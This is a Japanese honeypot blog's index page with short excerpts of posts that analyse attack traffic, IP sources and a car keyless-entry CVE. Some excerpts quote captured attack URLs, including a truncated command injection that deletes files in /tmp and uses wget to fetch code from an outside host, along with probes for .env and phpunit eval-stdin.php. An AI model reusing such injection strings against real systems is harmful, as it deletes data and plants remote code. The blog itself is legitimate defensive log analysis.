ハニーレポート

ハニーポット観測レポートを中心に書いていきます。

大量アクセスしてきたipアドレスを調べる#1

honey-pot-report.hatenablog.com 先週のレポートでアクセスが多かったipアドレスを調べます。ipアドレスは31.45.240.114です。 2001アクセスありました。このipアドレスを調べていきたいと思います。 ログ分析 ipアドレスはクロアチアから ハニーポット参考…

週刊ハニーレポート4月10日号

4月3日〜4月10日までのハニーポットへのアクセスログをレポートします。 アクセス数 IPアドレス別アクセス数 HTTPリクエストメソッド集計 HTTPステータスコード集計 アクセス数 4月8日、4月9日に2000を超えるアクセスが来ています。その他のアクセ…

週刊ハニーレポート4月3日号

3月27日から4月3日のハニーポットへのアクセスをレポートします。 週刊アクセス数 3月29日、30日、4月3日にアクセスが2000を超えています。 ipアドレスアクセス数 今週アクセスしてきたipアドレス別のアクセス数です。下記3つのipアドレス…

ホンダキーレスシステムの脆弱性についてまとめてみた

ホンダの乗用車シビックのキーレスシステムに脆弱性が発見された記事をまとめた記事になります。 脆弱性の種類 CVSS 関連CVSS 対象車 可能な悪用 攻撃方法 対策 関連記事 脆弱性の種類 キーレスシステムの脆弱性 CVSS CVE-2022-27254 Score: 未定 https://nv…

週刊ハニーレポート3月27日号

3月20日〜3月27日までのハニーポットへのアクセスレポート。 アクセス数 ipアドレス別アクセス数 HTTPリクエストメソッド HTTPステータスコード HTTP アクセスURL数 ハニーポット参考書籍 アクセス数 週刊アクセス数です。今週は100程度のアクセス…

週刊ハニーレポート3/20日号

3月15日〜3月20日のハニーポットのログのサマリーをレポートします。 デイリーアクセス HTTPアクセス HTTPステータスコード HTTPリクエスト ipアドレス別アクセス数トップ10 ハニーポット参考書籍 デイリーアクセス 3月16日、17日にアクセスが…

wgetしてくるやつを抽出するよ!

ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事により…

3/3の攻撃ログ分析 xmlのメッセージの中に禁止用語が!

今日来た攻撃の中から1件取り出して分析します。 今日来たアクセスのデータは以下になります。 アクセスログデータ POST /xmlrpc.php HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Content-Length: …

やってしまったぁぁぁぁ!

月初めでログを集計するスクリプトが動いてるか確認する時に間違えて、コマンドを打ってしまいログが消えました・・・ 上ボタンで過去に打ったコマンドを使おうとして、放ったコマンド。 $ sed -i '' -e 'd' hoge.txt ログファイルが消えてった・・・・ 今月…

初めての201リクエストが来たから調べたらやばいところからだった

ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。 本日のログに初めて201レスポンスを返す攻撃が来ました。 HTTPリクエストに関しては…

はるばるパナマからの大量アクセスwww

2月15日、16日に1000を超えるアクセスがありました。 ipアドレスを日別で集計すると犯人が見つかりました。下記が集計結果です。 2001 2022-02-16 201.218.229.228 2001 2022-02-15 201.218.229.228 1650 2022-02-16 210.210.26.37 541 2022-02-09 60.2…

OSコマンドインジェクションいただきました

下記のログを分析していくよ! 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 19 /favicon.ico 17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.syt…

URLログ分析 圧倒的管理者権限を取りにイクゥ!

ハニーポットのアクセスログを見ていきます。 ログの集計期間は2/3〜2/16です。 アクセスログの中から10アクセス以上のURLを抽出しました。 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/…

今週のアクセス2/3-2/13

ハニーポットを植えてから10日ほど経ちました。アクセス数を見ます。2月9日のアクセスが急激に伸びてます。基本的には土日のアクセスが多そうですね。急激なアクセスの後はアクセス数70程度で推移しています。この日に何が起きていたのでしょう?? 次…

クラウドサービスからのアクセス!?

今日来たアクセスを分析していきます。 ログの中から下記アクセスを見ていきます。 167.94.146.59 XXXXXXXXXXX "GET / HTTP/1.1" 200 False ※XXXXはマスクしてあります。 167.94.146.59のGETアクセスをしてきています。 base64でエンコードされている部分を…

正常に応答しなかったログの分析

今日はアクセスログの中で正常応答しなかったログを抽出して、1つのログをピックアップして分析します。 アクセスログの中でHTTPのレスポンスコード200以外の応答をgrepで抽出します。[1] コマンドは以下 cat access_log | grep -v 200 結果例 たくさんの正…

ハニーレポート#7 ログをbase64でデコードしてみる

アクセスログはbase64でエンコードされている部分がWOWHoneypotのアクセスログにあります。この文字列をデコードしてあげると、どんなコマンドを仕掛けているかわかります。1日数十から多い時は数百のアクセスがくるので全てにデコードして分析は非現実的で…

ハニーレポート#6 脆弱性を狙った攻撃を検知

ハニーポットを再構築して3日ほど経ちました。アクセスが早速きているのでログを見てみます。まだ、集計用のスクリプトなど作っていないので今日は不審なHTMLタグ挿入があるか抽出してみます。 ログ抽出用のコマンドはこちら[1] grep -E "<[^>]+>[^<]+<[^>]…

WOWHoneypot構築手順

ハニーポットを作成しましたが設定などメール送信したり、分析用コードを作成のためにpythonライブラリを色々入れたりしてました。これだと再構築したりするときに同じ手順を踏んで構築ができないので作り直して作成方法を記録することにしました。 環境 さ…

ハニーレポート #5 今週のアクセス

今週のアクセス数を見ていきます。 2022-01-17 122 2022-01-18 107 2022-01-19 147 2022-01-20 124 2022-01-21 153 2022-01-22 282 2022-01-23 185 2022-01-24 429 アクセス数 1月24日のが急にアクセスが伸びてます。 月曜日の平日なのに意外ですね。 攻…

ハニーレポート #4 PHPめっちゃくる〜

資格試験の勉強でハニーポットをレポートを書けていませんでした。 ログを少し見てみるとちょっと気になったのがこちら。 執拗なPHPMyAdminの管理者権限を取ろうとしているアクセスですね。 PHPのバージョンを片っ端から試してます。 画像は一部ですが短時間…

昨日何が起きたんだ!!? #3

1週間のハニーポットのレポートをします。 試行錯誤でログ解析していますw 今週のアクセス数はこちら。 日時 アクセス件数 2022-01-04 16 2022-01-05 127 2022-01-06 146 2022-01-07 145 2022-01-08 225 2022-01-09 199 2022-01-10 213 2022-01-11 118 2022…

気になるIPアドレスはロシア人 #2

ログの中で最もアクセスが多いIPアドレスに注目してみます。 45.146.165.37が113件来てます。 他にも98件来ている奴もいましたが今回はこいつに絞ります。 1件だけですのでIPアドレスを調べるサイトで調べます。 www.cman.jp リンク先に行くと下図のようにIP…

ハニーポットレポート#1 2021/01/10

WoWHoneypotを構築して1週間ほど経ったのでログを見てみます。 参考にした本はこちら。 WOWHoneypotの遊びかた “おもてなし”機能でサイバー攻撃を観察する! (技術の泉シリーズ(NextPublishing)) 作者:森久 和昭 インプレスR&D Amazon 構築時の設定で結構…